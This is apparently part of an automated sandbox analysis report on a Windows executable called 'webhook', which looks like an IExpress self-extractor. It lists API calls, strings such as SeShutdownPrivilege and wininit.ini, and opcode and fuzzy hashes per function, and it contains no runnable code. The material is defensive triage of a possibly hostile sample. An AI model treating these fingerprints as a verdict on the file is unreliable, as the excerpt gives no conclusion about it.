                          • Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd
                          Similarity
                          • API ID: ProcessToken$AdjustCloseCurrentExitHandleLookupOpenPrivilegePrivilegesValueWindows
                          • String ID: SeShutdownPrivilege
                          • API String ID: 2829607268-3733053543
                          • Opcode ID: 68f57858d0a37f1d9b97d15ccc180e4361d8fc185c2eeebe84e4efed2f4b6a83
                          • Instruction ID: cefcded75c1eb5cac22d8cbacd43070ceb160832f2a9784e645eafac4d947825
                          • Opcode Fuzzy Hash: 68f57858d0a37f1d9b97d15ccc180e4361d8fc185c2eeebe84e4efed2f4b6a83
                          • Instruction Fuzzy Hash: 8B219372A18643A3FB608B20E5497FABA60FB89745F589135DB8E93B54DF3CD055CB00
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true
                          • Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd
                          Similarity
                          • API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
                          • String ID:
                          • API String ID: 4104442557-0
                          • Opcode ID: a1a8c30bc5a850f7df6bb2e960b2db2709fe8c778fbb0e1b446c87b4c6fef4b3
                          • Instruction ID: 842d9c29c93abc4c6648e11ffba5e5dedc97f1c6bcf5abafe0056c5b1ca4a7dc
                          • Opcode Fuzzy Hash: a1a8c30bc5a850f7df6bb2e960b2db2709fe8c778fbb0e1b446c87b4c6fef4b3
                          • Instruction Fuzzy Hash: E1115E26A04B42AAEF10DF71ED452E833A4FB48758F480A30EAAD87754EF7CD5A58340
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true
                          • Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd
                          Similarity
                          • API ID: ExceptionFilterUnhandled
                          • String ID:
                          • API String ID: 3192549508-0
                          • Opcode ID: 33b5d242f9dae548e22f746f2c14e26181d9d5e8b558b2e26dfd9b2729eaeda7
                          • Instruction ID: 9febc9fd4651845afbbad9fcf54793e4123ba389db26f8f82954a5cd1d8f2d9f
                          • Opcode Fuzzy Hash: 33b5d242f9dae548e22f746f2c14e26181d9d5e8b558b2e26dfd9b2729eaeda7
                          • Instruction Fuzzy Hash: 48B09B466175C351D60557B54E4508515401B4653078C1954C754C2B50DD5CD16A4614
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true
                          • Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd
                          Similarity
                          • API ID: Char$Upper$Next$ByteCloseCompareExitFileHandleLeadModuleNameProcessString
                          • String ID: "$:$RegServer
                          • API String ID: 23972181-766454958
                          • Opcode ID: 30a90c34f7cbb46e34736c76c13f057931b7289761545bddfdfb8314716cf64c
                          • Instruction ID: f128cf94d0434619c8781452b7f1a40d90f19ed069e1ca401e9f38c21235a1d2
                          • Opcode Fuzzy Hash: 30a90c34f7cbb46e34736c76c13f057931b7289761545bddfdfb8314716cf64c
                          • Instruction Fuzzy Hash: E6120021E0C683B1FF648B24A6543F92BA1AF41794F5C4135C9DEA6799CE3DE839C702
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true
                          • Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd
                          Similarity
                          • API ID: EventItemMessageSendThreadWindow$CreateDesktopDialogResetTerminateText
                          • String ID:
                          • API String ID: 2654313074-3916222277
                          • Opcode ID: 161ecbf182c25f1165986d72c8c0059cd173de4edb9b55fbd2b049afc53b66ca
                          • Instruction ID: fb52c7fa28681e0dbfd8a15b63335a1217b11b568b84f0820bbabdfcfe42e369
                          • Opcode Fuzzy Hash: 161ecbf182c25f1165986d72c8c0059cd173de4edb9b55fbd2b049afc53b66ca
                          • Instruction Fuzzy Hash: 1A51A431D08643B6EB518B11EA452F96AA1FF89B51F1C8231C99EA3B94DF3CD465CB00
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true
                          • Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd
                          Similarity
                          • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
                          • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                          • API String ID: 1865808269-1731843650
                          • Opcode ID: a68a2c2134a308fc5224faae6e68b9a8e707b355ac96a450fb768dad26968aab
                          • Instruction ID: b57c088539f23ca5f7022d9c2b72674d2e64524a2a1cafb9bc8a7650c3b04e28
                          • Opcode Fuzzy Hash: a68a2c2134a308fc5224faae6e68b9a8e707b355ac96a450fb768dad26968aab
                          • Instruction Fuzzy Hash: 4F516132A09B83B6EB518B11AA101F97BA0FB89B90F4D4275CADD977A0DF3CE455C700
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true
                          • Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd
                          Similarity
                          • API ID: CharDirectory$NextSystem$CloseEnvironmentExpandOpenQueryStringsUpperValueWindows
                          • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                          • API String ID: 229715263-2428544900
                          • Opcode ID: 1142a4cd6e006e845246af9bdb5df0897ae5876e42b73e5154f1751647277efe
                          • Instruction ID: c4c4802ce5989c85ddbfc1630ddfc3220736666dd722a8ab21a2fad17e620f44
                          • Opcode Fuzzy Hash: 1142a4cd6e006e845246af9bdb5df0897ae5876e42b73e5154f1751647277efe
                          • Instruction Fuzzy Hash: F6518272618A93B6EB118F10E5452F97BA0FB8AB90FD85131DA8E93794DF3CD459C700
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true
                          • Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd
                          Similarity
                          • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                          • String ID:
                          • API String ID: 2168512254-0
                          • Opcode ID: 5aa378a5a02dea733385acf5e55f93e1415a95ae54cf52c9b480b087f5f96856
                          • Instruction ID: 5de7b15dde90c6ac66338acc963ba00f2d6ada8b50405d96faa1a94cd99881cb
                          • Opcode Fuzzy Hash: 5aa378a5a02dea733385acf5e55f93e1415a95ae54cf52c9b480b087f5f96856
                          • Instruction Fuzzy Hash: 60514036608B43EBE7208F21E5541E97BA4FB8DB94F495135DA8EA3764DF38D464CB00
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true
                          • Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd
                          Similarity
                          • API ID: Local$AllocMessage$EnumLanguagesResource$BeepCharCloseFreeLoadMetricsNextOpenQueryStringSystemValueVersion
                          • String ID: rce.
                          • API String ID: 2929476258-1858031711
                          • Opcode ID: 3ed11fbad5beae089dae1fca1131bae79aefec419c72aa5072dd9cc5e96e98b3
                          • Instruction ID: 85e16d4326c93330cae0b0dc09d82498ac19c1aa148412a50ed45e175d2377cd
                          • Opcode Fuzzy Hash: 3ed11fbad5beae089dae1fca1131bae79aefec419c72aa5072dd9cc5e96e98b3
                          • Instruction Fuzzy Hash: 5F71BF21E087C3B6FA518B25A6003F96A90AF55B94F1C4231DE8DA77D5EF3CE85A8301
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true
                          • Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd
                          Similarity
                          • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                          • String ID:
                          • API String ID: 3785188418-0
                          • Opcode ID: b99bfbc71c6e47e8d2dd802e5a3d49e478e887f1f55d0a3e4aad63706f5b073e
                          • Instruction ID: 5621ec8d5bcea4ba609926093deb310289a3e181c26d01075e154fed550ac5ae
                          • Opcode Fuzzy Hash: b99bfbc71c6e47e8d2dd802e5a3d49e478e887f1f55d0a3e4aad63706f5b073e
                          • Instruction Fuzzy Hash: BC315234908643B6EA518B20EA053F47B61FF8AB61F5C9230C99EA7395DF3CE469C701
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true
                          • Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd
                          Similarity
                          • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
                          • String ID: Control Panel\Desktop\ResourceLocale
                          • API String ID: 3346862599-1109908249
                          • Opcode ID: 79618cbf566f24ba719aea2154ce45ce3ef321f6ac2e06029fa2153c5c1a82fb
                          • Instruction ID: 5471c6e61e07b838ed3de230d9c1515a5c4545d84468cebfe7a0f93a12ee6838
                          • Opcode Fuzzy Hash: 79618cbf566f24ba719aea2154ce45ce3ef321f6ac2e06029fa2153c5c1a82fb
                          • Instruction Fuzzy Hash: 1B51A236E09683BAEB508B20E9401FD77A1FB99B50F484231DA9EA7794DF3CE514CB00
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true
                          • Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd
                          Similarity
                          • API ID: Char$Next$Upper$ByteFileLeadModuleNamePrev
                          • String ID:
                          • API String ID: 975904313-0
                          • Opcode ID: aa7ba7297077793f7d626753686711e9c4ffdaff21383c5eed26811cbffd48fb
                          • Instruction ID: 3603c1e3a77ccaa2ffd4953ca9e5350bb37c9589735c6fc816598ab935a141d5
                          • Opcode Fuzzy Hash: aa7ba7297077793f7d626753686711e9c4ffdaff21383c5eed26811cbffd48fb
                          • Instruction Fuzzy Hash: F3719F61A0D69775FF628F2596503FC6B90AF4AB90FCC8170CADE97781CE2CE4258711
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true
                          • Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd
                          Similarity
                          • API ID: Global$Char$FileInfoNextUnlockVersion$AllocDirectoryFreeLockQuerySizeUpperValueWindows
                          • String ID:
                          • API String ID: 2920131565-0
                          • Opcode ID: e2c6928dca72d3c9787df6f30925460e70e82d21755a383799fca88f808043d4
                          • Instruction ID: 01fdb8975077355444dabcae4103220586ee9bd621cf9b9ae05ae0a12ea3ddc5
                          • Opcode Fuzzy Hash: e2c6928dca72d3c9787df6f30925460e70e82d21755a383799fca88f808043d4
                          • Instruction Fuzzy Hash: 07618E72A08663BAEB108F1596445FC3BA1FB44794FD88431DE8DA3794DF38E8A1CB00
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true
                          • Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd
                          Similarity
                          • API ID: Window$CapsDeviceRect$Release
                          • String ID:
                          • API String ID: 2212493051-0
                          • Opcode ID: 6bf25506a061de764c46ff11c3dabc26361253386e945ff23246536f7576ff98
                          • Instruction ID: fcb105badbbaaf9fda59c4812ce5661def20b7ff700197e6c7d785667f0fac65
                          • Opcode Fuzzy Hash: 6bf25506a061de764c46ff11c3dabc26361253386e945ff23246536f7576ff98
                          • Instruction Fuzzy Hash: 48318D36B24602AAE7108B75E9059FD7BA1F789B99F585130CE4AA3B54CF38E445CB00
                          APIs
                          • LoadResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF650544FA3), ref: 00007FF650547BEF
                          • LockResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF650544FA3), ref: 00007FF650547BFE
                          • FreeResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF650544FA3), ref: 00007FF650547C4E
                          • FindResourceA.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF650544FA3), ref: 00007FF650547C82
                          • FreeResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF650544FA3), ref: 00007FF650547C9B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true
                          • Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd
                          Similarity
                          • API ID: Resource$Free$FindLoadLock
                          • String ID: UPDFILE%lu
                          • API String ID: 3629466761-2329316264
                          • Opcode ID: d41cb9711b44c5778f8d685044e0478faac0a7e9c0355c6fd43fe1abdcbe4688
                          • Instruction ID: 1c0dc0ae4de1f962f1b9ac9256cad3c04af824513e922cbf15447dd4c3a83f5f
                          • Opcode Fuzzy Hash: d41cb9711b44c5778f8d685044e0478faac0a7e9c0355c6fd43fe1abdcbe4688
                          • Instruction Fuzzy Hash: 8B319132A08B47E6E7108B25A6011F9BBA0FF89B90F594631EA9E93790CF3CE414C600
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true
                          • Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd
                          Similarity
                          • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                          • String ID: wininit.ini
                          • API String ID: 3273605193-4206010578
                          • Opcode ID: 9400fdb6d7a44d6df7f18705ef269f017eb9ad4388b642ce147a901e5ae05de9
                          • Instruction ID: 80d88a3c0834d05c4920fba23c7f5a91f55768315c8554d3b948fa4be94c6084
                          • Opcode Fuzzy Hash: 9400fdb6d7a44d6df7f18705ef269f017eb9ad4388b642ce147a901e5ae05de9
                          • Instruction Fuzzy Hash: 40114236708A82B7E7208B25E5552FA77A1FBCD714F898231DA8E93764DF3CD519CA00
                          APIs
                            • Part of subcall function 00007FF650545140: FindResourceExA.KERNEL32(?,?,0000000A,00007FF6505458A6), ref: 00007FF650545168
                            • Part of subcall function 00007FF650545140: SizeofResource.KERNEL32(?,?,0000000A,00007FF6505458A6), ref: 00007FF650545179
                            • Part of subcall function 00007FF650545140: FindResourceA.KERNEL32(?,?,0000000A,00007FF6505458A6), ref: 00007FF65054519F
                            • Part of subcall function 00007FF650545140: LoadResource.KERNEL32(?,?,0000000A,00007FF6505458A6), ref: 00007FF6505451B0
                            • Part of subcall function 00007FF650545140: LockResource.KERNEL32(?,?,0000000A,00007FF6505458A6), ref: 00007FF6505451BF
                            • Part of subcall function 00007FF650545140: memcpy_s.MSVCRT ref: 00007FF6505451DE
                            • Part of subcall function 00007FF650545140: FreeResource.KERNEL32(?,?,0000000A,00007FF6505458A6), ref: 00007FF6505451ED
                          • LocalAlloc.KERNEL32(?,?,?,?,00000000,00007FF65054498A), ref: 00007FF650544E5D
                          • LocalFree.KERNEL32(?,?,?,?,00000000,00007FF65054498A), ref: 00007FF650544EF9
                            • Part of subcall function 00007FF6505461E8: LoadStringA.USER32 ref: 00007FF650546278
                            • Part of subcall function 00007FF6505461E8: MessageBoxA.USER32 ref: 00007FF6505462B8
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true
                          • Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd
                          Similarity
                          • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                          • String ID: <None>$@$FINISHMSG
                          • API String ID: 3507850446-4126004490
                          • Opcode ID: f92227409698a50e80f775f4930689cd1eb965909ec3739b70e23f449fe7515b
                          • Instruction ID: d247be8d790619eaafed59fd9299357eb12152ce4db259c32bf4167b4a75e15d
                          • Opcode Fuzzy Hash: f92227409698a50e80f775f4930689cd1eb965909ec3739b70e23f449fe7515b
                          • Instruction Fuzzy Hash: 5E119D72A08343B3F7208B21E5117FA6690EB89785F489134DA8E96B89EF3CD1248B00
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true
                          • Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd
                          Similarity
                          • API ID: LibraryLoad$AttributesFile
                          • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$advpack.dll
                          • API String ID: 438848745-3680919256
                          • Opcode ID: 963a3f96620efcd57751c6ee7ade2dcdaa22df72e3894113d12d29ba1fba980a
                          • Instruction ID: 09fd482c2771bb23568de4693daea2b8743d71994d9a66568396476e702124fd
                          • Opcode Fuzzy Hash: 963a3f96620efcd57751c6ee7ade2dcdaa22df72e3894113d12d29ba1fba980a
                          • Instruction Fuzzy Hash: BF116071A18A87B6EE618B10E5513F877A0FB99B04F894232C6CD92791DF3CE529C700
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true
                          • Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd
                          Similarity
                          • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                          • String ID:
                          • API String ID: 1273765764-0
                          • Opcode ID: 65e6fbf51a895507969a40468058746c97c4b6aea9fe2f97e498a7505ce86659
                          • Instruction ID: 1c76fec543df12a7001ee32322942ae985b3104169acb440a89b6efff39bf393
                          • Opcode Fuzzy Hash: 65e6fbf51a895507969a40468058746c97c4b6aea9fe2f97e498a7505ce86659
                          • Instruction Fuzzy Hash: 9A215E71A08687B6EB604B21A5593F96660FB89B84F584130CACE96795CF3CD125C740
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true
                          • Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd
                          Similarity
                          • API ID: Window$Text$DesktopDialogForegroundItem
                          • String ID:
                          • API String ID: 761066910-0
                          • Opcode ID: d27efb2bfb772949979602fae28f15f48041aa30681c92464f837cb170850190
                          • Instruction ID: b4757954f550a53c0185688398bebed30b3b56246013a0a7daae9ce104c6ca03
                          • Opcode Fuzzy Hash: d27efb2bfb772949979602fae28f15f48041aa30681c92464f837cb170850190
                          • Instruction Fuzzy Hash: 4F115E74A08603F6FA554B65E6083F86A51EF8AB45F5D9030C98EA6394DF3CE468C601
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true
                          • Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd
                          Similarity
                          • API ID: File$CloseCreateHandleWrite
                          • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                          • API String ID: 1065093856-305352358
                          • Opcode ID: 0e03046e849406695a98d42d2011d6eb0c047299338339c8bc95bd8c917e975f
                          • Instruction ID: 738c585d0f782fcb36dd8e90f7ce9a0b0edf9dd244149d3026ee2f7e29efaded
                          • Opcode Fuzzy Hash: 0e03046e849406695a98d42d2011d6eb0c047299338339c8bc95bd8c917e975f
                          • Instruction Fuzzy Hash: AF317E32608A82B6EB608F10E5447FAB7A0FB89B94F484235DA9D97784CF7CD418CB00
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true
